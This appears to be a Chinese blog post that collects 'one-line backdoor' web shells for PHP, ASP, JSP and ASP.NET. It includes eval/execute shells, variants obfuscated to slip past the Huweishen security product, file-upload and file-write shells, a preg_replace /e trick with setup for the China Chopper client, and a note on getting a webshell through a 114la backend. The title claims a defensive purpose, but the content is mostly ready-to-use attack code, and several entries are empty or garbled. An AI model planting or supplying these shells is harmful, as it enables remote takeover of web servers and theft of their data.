整理的比较全的一句话后门代码(方面大家查找后门)

最近一句话后门不断升级大家注意防范,基本上多事字符替换

过护卫神PHP一句话作者:小东

复制代码 代码如下:

$a($_POST["c"]); ?>

测试成功,主要对付护卫神,其他的也可以试试

dedecms5.7一句话后门
@eval(file_get_contents('php://input'));

asp一句话木马

程序代码
<%eval request("sb")%>

程序代码
<%execute request("sb")%>

程序代码
<%execute(request("sb"))%>

程序代码
<%execute request("sb")%><%'<% loop <%:%>

程序代码
<%'<% loop <%:%><%execute request("sb")%>

程序代码
<%execute request("sb")'<% loop <%:%>[code]
[code]

程序代码
%><%Eval(Request(chr(35)))%><%

程序代码
<%eval request("sb")%>

程序代码
<%ExecuteGlobal request("sb")%>

程序代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容错代码
程序代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

//使用冰狐一句话客户端链接

程序代码
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

调用示例:
程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29


php一句话

程序代码


程序代码

//容错代码
程序代码

//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码


程序代码


程序代码
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
h=@eval($_POST[c]);

程序代码

//绕过
JSP一句话

程序代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

提交客户端

程序代码







ASPX一句话
程序代码
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

程序代码
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话

程序代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话

程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句话
第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入所以可以试用

你可能感兴趣的:(整理的比较全的一句话后门代码(方面大家查找后门))